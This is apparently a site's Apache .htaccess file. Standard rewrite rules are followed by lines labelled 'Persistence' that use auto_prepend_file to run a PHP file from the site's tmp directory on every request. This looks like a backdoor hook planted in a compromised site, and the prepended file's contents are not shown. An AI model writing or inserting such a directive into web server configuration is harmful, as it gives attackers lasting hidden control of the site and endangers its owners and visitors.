<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
</IfModule>
# Persistence - 2026-09-12
# Persistence - 2026-09-12
<IfModule mod_php.c>
php_value auto_prepend_file /var/www/vhosts/kinderchoere-moehnesee.de/httpdocs/tmp/yoru_ec094a.php
</IfModule>
<IfModule mod_php7.c>
php_value auto_prepend_file /var/www/vhosts/kinderchoere-moehnesee.de/httpdocs/tmp/yoru_ec094a.php
</IfModule>
